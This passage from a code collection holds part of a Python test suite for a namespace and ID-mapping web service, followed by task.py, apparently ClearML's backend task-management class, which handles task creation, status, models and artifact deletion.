headers={'Authorization': 'local ' + lut.token})
assert r.status_code == 204
# check the user is gone
r = requests.get('http://localhost:' + service_port + '/api/v1/namespace/myns',
headers={'Authorization': 'local ' + lut.token})
assert r.json() == {'namespace': 'myns', 'publicly_mappable': False, 'users': []}
# fail removing the user with a kbase admin
r = requests.delete('http://localhost:' + service_port +
'/api/v1/namespace/myns/user/kbase/imauser',
headers={'Authorization': 'kbase mytoken'})
assert_json_error_correct(
r.json(),
{'error': {'httpcode': 404,
'httpstatus': 'Not Found',
'appcode': 50000,
'apperror': 'No such user',
'message': ('50000 No such user: User kbase/imauser does not ' +
'administrate namespace myns')
}
})
assert r.status_code == 404
def test_set_public_and_list_namespaces(service_port, mongo):
storage = get_storage_instance(mongo)
lut = Token('foobar')
u = Username('lu')
storage.create_local_user(u, lut.get_hashed_token())
priv = NamespaceID('priv')
storage.create_namespace(priv)
storage.add_user_to_namespace(priv, User(AuthsourceID('local'), u))
storage.set_namespace_publicly_mappable(priv, True)
pub = NamespaceID('pub')
storage.create_namespace(pub)
storage.add_user_to_namespace(pub, User(AuthsourceID('local'), u))
r = requests.put('http://localhost:' + service_port +
'/api/v1/namespace/priv/set?publicly_mappable=false',
headers={'Authorization': 'local ' + lut.token})
assert r.status_code == 204
r = requests.put('http://localhost:' + service_port +
'/api/v1/namespace/pub/set?publicly_mappable=true',
headers={'Authorization': 'local ' + lut.token})
assert r.status_code == 204
r = requests.get('http://localhost:' + service_port + '/api/v1/namespace')
assert r.json() == {'publicly_mappable': ['pub'], 'privately_mappable': ['priv']}
r = requests.put('http://localhost:' + service_port +
'/api/v1/namespace/missing/set?publicly_mappable=false',
headers={'Authorization': 'local ' + lut.token})
assert_json_error_correct(
r.json(),
{'error': {'httpcode': 404,
'httpstatus': 'Not Found',
'appcode': 50010,
'apperror': 'No such namespace',
'message': '50010 No such namespace: missing'
}
})
assert r.status_code == 404
def test_mapping(service_port, mongo):
storage = get_storage_instance(mongo)
lut = Token('foobar')
u = Username('lu')
storage.create_local_user(u, lut.get_hashed_token())
priv = NamespaceID('priv')
storage.create_namespace(priv)
storage.add_user_to_namespace(priv, User(AuthsourceID('local'), u))
pub = NamespaceID('pub')
storage.create_namespace(pub)
storage.set_namespace_publicly_mappable(pub, True)
# create mappings
# test that the service ignores incorrect headers
r = requests.put('http://localhost:' + service_port + '/api/v1/mapping/priv/pub',
headers={'Authorization': 'local ' + lut.token,
'content-type': 'x-www-form-urlencoded'},
data=json.dumps({'id1': 'id2', 'id3': 'id4', 'id5': 'id6'}))
assert r.status_code == 204
# fail create mappings
r = requests.put('http://localhost:' + service_port + '/api/v1/mapping/priv/pub',
headers={'Authorization': 'focal ' + lut.token},
data=json.dumps({'id10': 'id11'}))
assert_json_error_correct(
r.json(),
{'error': {'httpcode': 404,
'httpstatus': 'Not Found',
'appcode': 50020,
'apperror': 'No such authentication source',
'message': '50020 No such authentication source: focal'
}
})
assert r.status_code == 404
# get mappings
r = requests.get('http://localhost:' + service_port + '/api/v1/mapping/pub?separate',
headers={'Authorization': 'local ' + lut.token},
data=json.dumps({'ids': ['id2', 'id4', 'id8']}))
assert r.json() == {'id2': {'other': [{'ns': 'priv', 'id': 'id1'}], 'admin': []},
'id4': {'other': [{'ns': 'priv', 'id': 'id3'}], 'admin': []},
'id8': {'other': [], 'admin': []}
}
# fail get mappings
r = requests.get('http://localhost:' + service_port + '/api/v1/mapping/plub?separate',
headers={'Authorization': 'local ' + lut.token},
data=json.dumps({'ids': ['id2', 'id4', 'id8']}))
assert_json_error_correct(
r.json(),
{'error': {'httpcode': 404,
'httpstatus': 'Not Found',
'appcode': 50010,
'apperror': 'No such namespace',
'message': "50010 No such namespace: ['plub']"
}
})
assert r.status_code == 404
# delete mappings
r = requests.delete('http://localhost:' + service_port + '/api/v1/mapping/priv/pub',
headers={'Authorization': 'local ' + lut.token,
'content-type': 'x-www-form-urlencoded'},
data=json.dumps({'id1': 'id7', 'id3': 'id4', 'id5': 'id6'}))
assert r.status_code == 204
# get mappings
r = requests.get('http://localhost:' + service_port + '/api/v1/mapping/pub',
headers={'Authorization': 'local ' + lut.token},
data=json.dumps({'ids': ['id2', 'id4']}))
assert r.json() == {'id2': {'mappings': [{'ns': 'priv', 'id': 'id1'}]},
'id4': {'mappings': []}
}
# fail delete mappings
r = requests.delete('http://localhost:' + service_port + '/api/v1/mapping/pub/priv',
headers={'Authorization': 'local ' + lut.token,
'content-type': 'x-www-form-urlencoded'},
data=json.dumps({'id2': 'id1'}))
assert_json_error_correct(
r.json(),
{'error': {'httpcode': 403,
'httpstatus': 'Forbidden',
'appcode': 20000,
'apperror': 'Unauthorized',
'message': ('20000 Unauthorized: User local/lu may not administrate ' +
'namespace pub')
}
})
assert r.status_code == 403
# test mapping to same namespace
r = requests.put('http://localhost:' + service_port + '/api/v1/mapping/priv/priv',
headers={'Authorization': 'local ' + lut.token},
data=json.dumps({'id20': 'id21'}))
assert r.status_code == 204
# get mappings
r = requests.get('http://localhost:' + service_port + '/api/v1/mapping/priv?separate',
headers={'Authorization': 'local ' + lut.token},
data=json.dumps({'ids': ['id1', 'id21', 'id20']}))
assert r.json() == {'id1': {'admin': [{'ns': 'pub', 'id': 'id2'}], 'other': []},
'id21': {'other': [{'ns': 'priv', 'id': 'id20'}], 'admin': []},
'id20': {'other': [], 'admin': [{'ns': 'priv', 'id': 'id21'}]}
}
|
task.py
|
""" Backend task management support """
import itertools
import json
import logging
import os
import re
import sys
import warnings
from copy import copy
from datetime import datetime
from enum import Enum
from multiprocessing import RLock
from operator import itemgetter
from tempfile import gettempdir
from threading import Thread
from typing import Optional, Any, Sequence, Callable, Mapping, Union, List, Set
from uuid import uuid4
from pathlib2 import Path
try:
# noinspection PyCompatibility
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import six
from six.moves.urllib.parse import quote
from ...utilities.locks import RLock as FileRLock
from ...utilities.proxy_object import verify_basic_type
from ...binding.artifacts import Artifacts
from ...backend_interface.task.development.worker import DevWorker
from ...backend_interface.session import SendError
from ...backend_api import Session
from ...backend_api.services import tasks, models, events, projects
from ...backend_api.session.defs import ENV_OFFLINE_MODE
from ...utilities.pyhocon import ConfigTree, ConfigFactory
from ...utilities.config import config_dict_to_text, text_to_config_dict
from ..base import IdObjectBase, InterfaceBase
from ..metrics import Metrics, Reporter
from ..model import Model
from ..setupuploadmixin import SetupUploadMixin
from ..util import (
make_message, get_or_create_project, get_single_result,
exact_match_regex, mutually_exclusive, )
from ...config import (
get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR,
running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR, get_offline_dir, get_log_to_backend, deferred_config, )
from ...debugging import get_logger
from ...storage.helper import StorageHelper, StorageError
from .access import AccessMixin
from .repo import ScriptInfo, pip_freeze
from .hyperparams import HyperParams
from ...config import config, PROC_MASTER_ID_ENV_VAR, SUPPRESS_UPDATE_MESSAGE_ENV_VAR, DOCKER_BASH_SETUP_ENV_VAR
from ...utilities.process.mp import SingletonLock
class Task(IdObjectBase, AccessMixin, SetupUploadMixin):
""" Task manager providing task object access and management. Includes read/write access to task-associated
frames and models.
"""
_anonymous_dataview_id = '__anonymous__'
_development_tag = 'development'
archived_tag = 'archived'
_default_configuration_section_name = 'General'
_legacy_parameters_section_name = 'Args'
_force_requirements = {}
_ignore_requirements = set()
_store_diff = deferred_config('development.store_uncommitted_code_diff', False)
_store_remote_diff = deferred_config('development.store_code_diff_from_remote', False)
_report_subprocess_enabled = deferred_config('development.report_use_subprocess', sys.platform == 'linux')
_force_use_pip_freeze = deferred_config(multi=[('development.detect_with_pip_freeze', False),
('development.detect_with_conda_freeze', False)])
_force_store_standalone_script = False
_offline_filename = 'task.json'
class TaskTypes(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
training = 'training'
testing = 'testing'
inference = "inference"
data_processing = "data_processing"
application = "application"
monitor = "monitor"
controller = "controller"
optimizer = "optimizer"
service = "service"
qc = "qc"
custom = "custom"
class TaskStatusEnum(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
created = "created"
queued = "queued"
in_progress = "in_progress"
stopped = "stopped"
published = "published"
publishing = "publishing"
closed = "closed"
failed = "failed"
completed = "completed"
unknown = "unknown"
class DeleteError(Exception):
pass
def __init__(self, session=None, task_id=None, log=None, project_name=None,
task_name=None, task_type=TaskTypes.training, log_to_backend=True,
raise_on_validation_errors=True, force_create=False):
"""
Create a new task instance.
:param session: Optional API Session instance. If not provided, a default session based on the system's
configuration will be used.
:type session: Session
:param task_id: Optional task ID. If not provided, a new task will be created using the API
and its information reflected in the resulting instance.
:type task_id: string
:param log: Optional log to be used. If not provided, an internal log shared with all backend objects will be
used instead.
:type log: logging.Logger
:param project_name: Optional project name, minimum length of 3 characters, used only if a new task is created.
The new task will be associated with a project by this name. If no such project exists, a new project will
be created using the API.
:type project_name: str
:param task_name: Optional task name, minimum length of 3 characters, used only if a new task is created.
:type task_name: str
:param task_type: Optional task type, used only if a new task is created. Default is training task.
:type task_type: str (see tasks.TaskTypeEnum)
:param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API.
This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND.
:type log_to_backend: bool
:param force_create: If True a new task will always be created (task_id, if provided, will be ignored)
:type force_create: bool
"""
SingletonLock.instantiate()
task_id = self._resolve_task_id(task_id, log=log) if not force_create else None
self.__edit_lock = None
super(Task, self).__init__(id=task_id, session=session, log=log)
self._project_name = None
self._storage_uri = None
self._metrics_manager = None
self.__reporter = None
self._curr_label_stats = {}
self._raise_on_validation_errors = raise_on_validation_errors
self._parameters_allowed_types = tuple(set(
six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None))
))
self._app_server = None
self._files_server = None
self._initial_iteration_offset = 0
self._reload_skip_flag = False
if not task_id:
# generate a new task
self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type)
if self._offline_mode:
self.data.id = self.id
self.name = task_name
else:
# this is an existing task, let's try to verify stuff
self._validate(check_output_dest_credentials=False)
if self.data is None:
raise ValueError("Task ID \"{}\" could not be found".format(self.id))
self._project_name = (self.project, project_name)
if running_remotely() or DevWorker.report_stdout:
log_to_backend = False
self._log_to_backend = get_log_to_backend(default=log_to_backend)
self._artifacts_manager = Artifacts(self)
self._hyper_params_manager = HyperParams(self)
def _validate(self, check_output_dest_credentials=False):
if not self._is_remote_main_task():
self._storage_uri = self.get_output_destination(raise_on_error=False, log_on_error=False) or None
return
raise_errors = self._raise_on_validation_errors
output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False)
if output_dest and check_output_dest_credentials:
try:
self.log.info('Validating output destination')
conf = get_config_for_bucket(base_url=output_dest)
if not conf:
msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest
self.log.warning(msg)
if raise_errors:
raise Exception(msg)
except StorageError:
raise
except Exception as ex:
self.log.error('Failed trying to verify output destination: %s' % ex)
@classmethod
def _resolve_task_id(cls, task_id, log=None):
if not task_id:
task_id = cls.normalize_id(get_remote_task_id())
if task_id:
log = log or get_logger('task')
log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id))
return task_id
def _update_repository(self):
def check_package_update():
# noinspection PyBroadException
try:
# check latest version
from ...utilities.check_updates import CheckPackageUpdates
latest_version = CheckPackageUpdates.check_new_package_available(only_once=True)
if latest_version and not SUPPRESS_UPDATE_MESSAGE_ENV_VAR.get(
default=config.get('development.suppress_update_message', False)):
if not latest_version[1]:
sep = os.linesep
self.get_logger().report_text(
'{} new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
Session.get_clients()[0][0].upper(), latest_version[0], sep.join(latest_version[2])),
)
else:
self.get_logger().report_text(
'ClearML new version available: upgrade to v{} is recommended!'.format(
latest_version[0]),
)
except Exception:
pass
# get repository and create requirements.txt from code base
try:
check_package_update_thread = Thread(target=check_package_update)
check_package_update_thread.daemon = True
check_package_update_thread.start()
# do not request requirements, because it might be a long process, and we first want to update the git repo
result, script_requirements = ScriptInfo.get(
filepaths=[self._calling_filename, sys.argv[0], ]
if ScriptInfo.is_running_from_module() else [sys.argv[0], self._calling_filename, ],
log=self.log,
create_requirements=False,
check_uncommitted=self._store_diff,
uncommitted_from_remote=self._store_remote_diff,
force_single_script=self._force_store_standalone_script,
)
for msg in result.warning_messages:
self.get_logger().report_text(msg)
# if the git is too large to store on the task, we must store it as artifact:
if result.auxiliary_git_diff:
diff_preview = "# git diff too large to handle, storing as artifact. git diff summary:\n"
diff_preview += '\n'.join(
line for line in result.auxiliary_git_diff.split('\n') if line.startswith('diff --git '))
self._artifacts_manager.upload_artifact(
name='auxiliary_git_diff', artifact_object=result.auxiliary_git_diff,
preview=diff_preview,
)
# store original entry point
entry_point = result.script.get('entry_point') if result.script else None
# check if we are running inside a module, then we should set our entry point
# to the module call including all argv's
result.script = ScriptInfo.detect_running_module(result.script)
# Since we might run asynchronously, don't use self.data (let someone else
# overwrite it before we have a chance to call edit)
with self._edit_lock:
self.reload()
self.data.script = result.script
self._edit(script=result.script)
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if result.script and script_requirements:
entry_point_filename = None if config.get('development.force_analyze_entire_repo', False) else \
os.path.join(result.script['working_dir'], entry_point)
if self._force_use_pip_freeze:
if isinstance(self._force_use_pip_freeze, (str, Path)):
conda_requirements = ''
req_file = Path(self._force_use_pip_freeze)
requirements = req_file.read_text() if req_file.is_file() else None
else:
requirements, conda_requirements = pip_freeze(
combine_conda_with_pip=config.get('development.detect_with_conda_freeze', True))
requirements = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n\n'\
+ requirements
else:
requirements, conda_requirements = script_requirements.get_requirements(
entry_point_filename=entry_point_filename)
if requirements:
if not result.script['requirements']:
result.script['requirements'] = {}
result.script['requirements']['pip'] = requirements
result.script['requirements']['conda'] = conda_requirements
self._update_requirements(result.script.get('requirements') or '')
# we do not want to wait for the check version thread,
# because someone might wait for us to finish the repo detection update
except SystemExit:
pass
except Exception as e:
get_logger('task').debug(str(e))
def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training):
created_msg = make_message('Auto-generated at %(time)s UTC by %(user)s@%(host)s')
if isinstance(task_type, self.TaskTypes):
task_type = task_type.value
if task_type not in (self.TaskTypes.training.value, self.TaskTypes.testing.value) and \
not Session.check_min_api_version('2.8'):
print('WARNING: Changing task type to "{}" : '
'clearml-server does not support task type "{}", '
'please upgrade clearml-server.'.format(self.TaskTypes.training, task_type))
task_type = self.TaskTypes.training.value
project_id = None
if project_name:
project_id = get_or_create_project(self, project_name)
tags = [self._development_tag] if not running_remotely() else []
extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags}
req = tasks.CreateRequest(
name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'),
type=tasks.TaskTypeEnum(task_type),
comment=created_msg,
project=project_id,
input={'view': {}},
**extra_properties
)
res = self.send(req)
return res.response.id if res else 'offline-{}'.format(str(uuid4()).replace("-", ""))
def _set_storage_uri(self, value):
value = value.rstrip('/') if value else None
self._storage_uri = StorageHelper.conform_url(value)
self.data.output.destination = self._storage_uri
self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None))
@property
def storage_uri(self):
# type: () -> Optional[str]
if self._storage_uri:
return self._storage_uri
if running_remotely():
return self.data.output.destination
else:
return None
@storage_uri.setter
def storage_uri(self, value):
# type: (str) -> ()
self._set_storage_uri(value)
@property
def task_id(self):
# type: () -> str
return self.id
@property
def name(self):
# type: () -> str
return self.data.name or ''
@name.setter
def name(self, value):
# type: (str) -> ()
self.set_name(value)
@property
def task_type(self):
# type: () -> str
return self.data.type
@property
def project(self):
# type: () -> str
return self.data.project
@property
def parent(self):
# type: () -> str
return self.data.parent
@property
def input_models_id(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version("2.13"):
model_id = self._get_task_property('execution.model', raise_on_error=False)
return {'Input Model': model_id} if model_id else {}
input_models = self._get_task_property('models.input', default=[]) or []
return {m.name: m.model for m in input_models}
@property
def output_models_id(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version("2.13"):
model_id = self._get_task_property('output.model', raise_on_error=False)
return {'Output Model': model_id} if model_id else {}
output_models = self._get_task_property('models.output', default=[]) or []
return {m.name: m.model for m in output_models}
@property
def comment(self):
# type: () -> str
return self.data.comment or ''
@comment.setter
def comment(self, value):
# type: (str) -> ()
self.set_comment(value)
@property
def cache_dir(self):
# type: () -> Path
""" The cache directory which is used to store the Task related files. """
return Path(get_cache_dir()) / self.id
@property
def status(self):
# type: () -> str
"""
The Task's status. To keep the Task updated, ClearML reloads the Task status
information only when this value is accessed.
:return str: TaskStatusEnum status
"""
return self.get_status()
@property
def _status(self):
# type: () -> str
""" Return the task's cached status (don't reload if we don't have to) """
return str(self.data.status)
def reload(self):
# type: () -> ()
"""
Reload current Task's state from clearml-server.
Refresh all task's fields, including artifacts / models / parameters etc.
"""
return super(Task, self).reload()
def _get_output_model(self, upload_required=True, model_id=None):
# type: (bool, Optional[str]) -> Model
return Model(
session=self.session,
model_id=model_id or None,
cache_dir=self.cache_dir,
upload_storage_uri=self.storage_uri or self.get_output_destination(
raise_on_error=upload_required, log_on_error=upload_required),
upload_storage_suffix=self._get_output_destination_suffix('models'),
log=self.log)
@property
def metrics_manager(self):
# type: () -> Metrics
""" A metrics manager used to manage the metrics related to this task """
return self._get_metrics_manager(self.get_output_destination())
@property
def _reporter(self):
# type: () -> Reporter
"""
Returns a simple metrics reporter instance.
"""
if self.__reporter is None:
self._setup_reporter()
return self.__reporter
def _get_metrics_manager(self, storage_uri):
# type: (str) -> Metrics
if self._metrics_manager is None:
self._metrics_manager = Metrics(
session=self.session,
task=self,
storage_uri=storage_uri,
storage_uri_suffix=self._get_output_destination_suffix('metrics'),
iteration_offset=self.get_initial_iteration()
)
return self._metrics_manager
def _setup_reporter(self):
# type: () -> Reporter
try:
storage_uri = self.get_output_destination(log_on_error=False)
except ValueError:
storage_uri = None
self.__reporter = Reporter(
metrics=self._get_metrics_manager(storage_uri=storage_uri), task=self)
return self.__reporter
def _get_output_destination_suffix(self, extra_path=None):
# type: (Optional[str]) -> str
# limit path to support various storage infrastructure limits (such as max path on posix or object storage)
# project path is limited to 256 characters (including subproject names), and task name to 128.
def limit_folder_name(a_name, uuid, max_length, always_add_uuid):
if always_add_uuid:
return '{}.{}'.format(a_name[:max(2, max_length-len(uuid)-1)], uuid)
if len(a_name) < max_length:
return a_name
return '{}.{}'.format(a_name[:max(2, max_length-len(uuid)-1)], uuid)
return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in
(limit_folder_name(self.get_project_name(), str(self.project), 256, False),
limit_folder_name(self.name, str(self.data.id), 128, True),
extra_path) if x)
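# Worked example (hypothetical names): project 'examples' (id 'p123') and task
# 'my experiment' (id 'abc123') with extra_path='models' yield
# 'examples/my experiment.abc123/models'. The task folder always gets the task
# id appended, while the project folder keeps its plain name as long as it
# fits within the 256-character limit.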
def _reload(self):
# type: () -> Any
""" Reload the task object from the backend """
with self._edit_lock:
if self._offline_mode:
# noinspection PyBroadException
try:
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'rt') as f:
stored_dict = json.load(f)
stored_data = tasks.Task(**stored_dict)
# add missing entries
for k, v in stored_dict.items():
if not hasattr(stored_data, k):
setattr(stored_data, k, v)
if stored_dict.get('project_name'):
self._project_name = (None, stored_dict.get('project_name'))
except Exception:
stored_data = self._data
return stored_data or tasks.Task(
execution=tasks.Execution(
parameters={}, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd=''),
output=tasks.Output())
if self._reload_skip_flag and self._data:
return self._data
res = self.send(tasks.GetByIdRequest(task=self.id))
return res.response.task
def reset(self, set_started_on_success=True, force=False):
# type: (bool, bool) -> ()
"""
Reset the task. Task will be reloaded following a successful reset.
:param set_started_on_success: If True automatically set Task status to started after resetting it.
:param force: If not true, call fails if the task status is 'completed'
"""
self.send(tasks.ResetRequest(task=self.id, force=force))
if set_started_on_success:
self.started()
elif self._data:
# if not started, make sure the current cached state is synced
self._data.status = self.TaskStatusEnum.created
self.reload()
def started(self, ignore_errors=True, force=False):
# type: (bool, bool) -> ()
""" The signal that this Task started. """
return self.send(tasks.StartedRequest(self.id, force=force), ignore_errors=ignore_errors)
def stopped(self, ignore_errors=True, force=False, status_reason=None):
# type: (bool, bool, Optional[str]) -> ()
""" The signal that this Task stopped. """
return self.send(
tasks.StoppedRequest(self.id, force=force, status_reason=status_reason),
ignore_errors=ignore_errors
)
def completed(self, ignore_errors=True):
# type: (bool) -> ()
"""
.. note:: Deprecated, use mark_completed(...) instead
"""
warnings.warn("'completed' is deprecated; use 'mark_completed' instead.", DeprecationWarning)
return self.mark_completed(ignore_errors=ignore_errors)
def mark_completed(self, ignore_errors=True, status_message=None, force=False):
# type: (bool, Optional[str], bool) -> ()
""" The signal indicating that this Task completed. """
if hasattr(tasks, 'CompletedRequest') and callable(tasks.CompletedRequest):
return self.send(
tasks.CompletedRequest(self.id, status_reason='completed', status_message=status_message, force=force),
ignore_errors=ignore_errors
)
return self.send(
tasks.StoppedRequest(self.id, status_reason='completed', status_message=status_message, force=force),
ignore_errors=ignore_errors
)
def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None, force=False):
# type: (bool, Optional[str], Optional[str], bool) -> ()
""" The signal that this Task stopped. """
return self.send(
tasks.FailedRequest(
task=self.id, status_reason=status_reason, status_message=status_message, force=force),
ignore_errors=ignore_errors,
)
def publish(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal that this Task will be published """
if str(self.status) not in (str(tasks.TaskStatusEnum.stopped), str(tasks.TaskStatusEnum.completed)):
raise ValueError("Can't publish, Task is not stopped")
resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors)
assert isinstance(resp.response, tasks.PublishResponse)
return resp
def _delete(
self,
delete_artifacts_and_models=True,
skip_models_used_by_other_tasks=True,
raise_on_error=False,
):
# type: (bool, bool, bool) -> bool
"""
Delete the task as well as its output models and artifacts.
Models and artifacts are deleted from their storage locations, each using its URI.
Note: in order to delete models and artifacts using their URI, make sure the proper storage credentials are
configured in your configuration file (e.g. if an artifact is stored in S3, make sure sdk.aws.s3.credentials
are properly configured and that you have delete permission in the related buckets).
:param delete_artifacts_and_models: If True, artifacts and models will also be deleted (default True)
:param skip_models_used_by_other_tasks: If True, models used by other tasks will not be deleted (default True)
:param raise_on_error: If True, an exception will be raised when encountering an error.
If False, an error will be printed and no exception will be raised.
:return: True if the task was deleted successfully.
"""
try:
res = self.send(tasks.GetByIdRequest(self.task_id))
task = res.response.task
if task.status == Task.TaskStatusEnum.published:
if raise_on_error:
raise self.DeleteError("Cannot delete published task {}".format(self.task_id))
self.log.error("Cannot delete published task {}".format(self.task_id))
return False
execution = {}
models_res = []
if delete_artifacts_and_models:
execution = task.execution.to_dict() if task.execution else {}
models_res = self.send(
models.GetAllRequest(
task=[task.id], only_fields=["id", "uri"]
)
).response.models
event_uris = list(self._get_all_events(
event_type="training_debug_image", unique_selector=itemgetter("url"), batch_size=10000
))
event_uris.extend(self._get_image_plot_uris())
task_deleted = self.send(tasks.DeleteRequest(self.task_id, force=True))
if not task_deleted:
if raise_on_error:
raise self.DeleteError("Failed deleting task {}".format(self.task_id))
self.log.error("Failed deleting task {}".format(self.task_id))
return False
except self.DeleteError:
raise
except Exception as ex:
if raise_on_error:
raise self.DeleteError("Task deletion failed: {}".format(ex))
self.log.error("Task deletion failed: {}".format(ex))
return False
failures = []
if delete_artifacts_and_models:
for e in execution["artifacts"]:
if e["mode"] == "output" and not self._delete_uri(e["uri"]):
failures.append(e["uri"])
for m in models_res:
# noinspection PyBroadException
try:
is_output_model = task.output and (m.id == task.output.model)
res = self.send(
models.DeleteRequest(m.id, force=(not skip_models_used_by_other_tasks)),
ignore_errors=is_output_model
)
# Should delete if the model was deleted, or if this was the output model (which was already deleted
# by DeleteRequest, and its URI is dangling)
should_delete = is_output_model or res.response.deleted
except SendError as ex:
if (ex.result.meta.result_code, ex.result.meta.result_subcode) == (400, 201):
# Model not found, already deleted by DeleteRequest
should_delete = True
else:
failures.append("model id: {}".format(m.id))
continue
except Exception:
failures.append("model id: {}".format(m.id))
continue
if should_delete and not self._delete_uri(m.uri):
failures.append(m.uri)
event_uris = list(filter(None, event_uris))
for uri in event_uris:
if not self._delete_uri(uri):
failures.append(uri)
failures = list(filter(None, failures))
if len(failures):
error = "Failed deleting the following URIs:\n{}".format(
"\n".join(failures)
)
if raise_on_error:
raise self.DeleteError(error)
self.log.error(error)
return task_deleted
def _delete_uri(self, uri):
# type: (str) -> bool
# noinspection PyBroadException
try:
deleted = StorageHelper.get(uri).delete(uri)
if deleted:
self.log.debug("Deleted file: {}".format(uri))
return True
except Exception as ex:
self.log.error("Failed deleting {}: {}".format(uri, str(ex)))
return False
return False
def _get_image_plot_uris(self):
# type: () -> Set[str]
def image_source_selector(d):
plot = d.get("plot_str")
if plot:
# noinspection PyBroadException
try:
plot = json.loads(plot)
return next(
filter(None, (image.get("source") for image in plot.get("layout", {}).get("images", []))),
None
)
except Exception:
pass
return self._get_all_events(
event_type="plot",
unique_selector=image_source_selector,
batch_size=10000
)
def update_model_desc(self, new_model_desc_file=None):
# type: (Optional[str]) -> ()
""" Change the Task's model description. """
with self._edit_lock:
self.reload()
execution = self._get_task_property('execution')
p = Path(new_model_desc_file)
if not p.is_file():
raise IOError('model_desc file %s cannot be found' % new_model_desc_file)
new_model_desc = p.read_text()
model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design'
execution.model_desc[model_desc_key] = new_model_desc
res = self._edit(execution=execution)
return res.response
def update_output_model(
self,
model_path, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
model_name=None, # type: Optional[str]
iteration=None, # type: Optional[int]
):
# type: (...) -> str
"""
Update the Task's output model weights file. First, ClearML uploads the file to the preconfigured output
destination (see the Task's ``output.destination`` property or call the ``setup_upload`` method),
then ClearML updates the model object associated with the Task via an API call. The API call uses the URI
of the uploaded file, and other values provided by additional arguments.
:param model_path: A local weights file or folder to be uploaded.
If a remote URI is provided (e.g. http:// or s3:// etc.) then the URI is stored as is, without any upload
:param name: The updated model name.
If not provided, the name is the model weights file filename without the extension.
:param comment: The updated model description. (Optional)
:param tags: The updated model tags. (Optional)
:param model_name: If provided the model name as it will appear in the model artifactory. (Optional)
Default: Task.name - name
:param iteration: iteration number for the current stored model (Optional)
:return: The URI of the uploaded weights file.
Notice: the upload is done in a background thread, while the function call returns immediately
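A minimal usage sketch (assuming ``task`` is an existing instance of this class; the weights path is a placeholder):
.. code-block:: py
uri = task.update_output_model('/tmp/model_weights.pt', name='final weights', iteration=1000)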
"""
from ...model import OutputModel
output_model = OutputModel(
task=self,
name=model_name or ('{} - {}'.format(self.name, name) if name else self.name),
tags=tags,
comment=comment
)
output_model.connect(task=self, name=name)
url = output_model.update_weights(weights_filename=model_path, iteration=iteration)
return url
@property
def labels_stats(self):
# type: () -> dict
""" Get accumulated label stats for the current/last frames iteration """
return self._curr_label_stats
def _accumulate_label_stats(self, roi_stats, reset=False):
# type: (dict, bool) -> ()
if reset:
self._curr_label_stats = {}
for label in roi_stats:
if label in self._curr_label_stats:
self._curr_label_stats[label] += roi_stats[label]
else:
self._curr_label_stats[label] = roi_stats[label]
def set_input_model(
self,
model_id=None,
model_name=None,
update_task_design=True,
update_task_labels=True,
name=None
):
# type: (str, Optional[str], bool, bool, Optional[str]) -> ()
"""
Set a new input model for the Task. The model must be "ready" (status is ``Published``) to be used as the
Task's input model.
:param model_id: The Id of the model on the **ClearML Server** (backend). If ``model_name`` is not specified,
then ``model_id`` must be specified.
:param model_name: The model name in the artifactory. The model_name is used to locate an existing model
in the **ClearML Server** (backend). If ``model_id`` is not specified,
then ``model_name`` must be specified.
:param update_task_design: Update the Task's design
- ``True`` - ClearML copies the Task's model design from the input model.
- ``False`` - ClearML does not copy the Task's model design from the input model.
:param update_task_labels: Update the Task's label enumeration
- ``True`` - ClearML copies the Task's label enumeration from the input model.
- ``False`` - ClearML does not copy the Task's label enumeration from the input model.
:param name: Model section name to be stored on the Task (unrelated to the model object name itself)
Default: the model weight filename is used (excluding file extension)
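A minimal usage sketch (assuming ``task`` is an existing instance of this class; the model id is a placeholder):
.. code-block:: py
task.set_input_model(model_id='<model-id>', update_task_design=True, update_task_labels=True)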
"""
if model_id is None and not model_name:
raise ValueError('Expected one of [model_id, model_name]')
if model_name and not model_id:
# Try getting the model by name. Limit to 10 results.
res = self.send(
models.GetAllRequest(
name=exact_match_regex(model_name),
ready=True,
page=0,
page_size=10,
order_by=['-created'],
only_fields=['id', 'created', 'uri']
)
)
model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log)
model_id = model.id
if model_id:
res = self.send(models.GetByIdRequest(model=model_id))
model = res.response.model
if not model.ready:
# raise ValueError('Model %s is not published (not ready)' % model_id)
self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri))
name = name or Path(model.uri).stem
else:
# clear the input model
model = None
model_id = ''
name = name or 'Input Model'
with self._edit_lock:
self.reload()
# store model id
if Session.check_min_api_version("2.13"):
self.send(tasks.AddOrUpdateModelRequest(
task=self.id, name=name, model=model_id, type=tasks.ModelTypeEnum.input
))
else:
# backwards compatibility
self._set_task_property("execution.model", model_id, raise_on_error=False, log_on_error=False)
# Auto populate from model, if empty
if update_task_labels and not self.data.execution.model_labels:
self.data.execution.model_labels = model.labels if model else {}
self._edit(execution=self.data.execution)
